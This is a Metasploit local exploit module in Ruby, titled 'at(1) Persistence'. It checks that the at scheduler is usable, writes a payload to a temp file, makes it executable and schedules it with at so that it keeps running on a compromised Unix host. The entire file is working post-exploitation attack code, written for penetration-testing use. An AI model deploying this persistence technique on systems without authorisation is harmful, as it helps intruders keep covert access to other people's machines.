##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'at(1) Persistence',
'Description' => %q(
This module achieves persisience by executing payloads via at(1).
),
'License' => MSF_LICENSE,
'Author' =>
[
'Jon Hart <jon_hart@rapid7.com>'
],
'Targets' => [['Automatic', {} ]],
'DefaultTarget' => 0,
'Platform' => %w(unix),
'Arch' => ARCH_CMD,
'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
)
)
register_options(
[
OptString.new('TIME', [false, 'When to run job via at(1). Changing may require WfsDelay to be adjusted.', 'now'])
]
)
register_advanced_options(
[
OptString.new('PATH', [false, 'Path to store payload to be executed by at(1). Leave unset to use mktemp.'])
]
)
end
def check
token = Rex::Text.rand_text_alphanumeric(8)
if cmd_exec("atq && echo #{token}").include?(token)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NoAccess, 'User denied cron via at.deny')
end
unless (payload_file = (datastore['PATH'] || cmd_exec('mktemp')))
fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
end
write_file(payload_file, payload.encoded)
register_files_for_cleanup(payload_file)
cmd_exec("chmod 700 #{payload_file}")
cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")
end
end
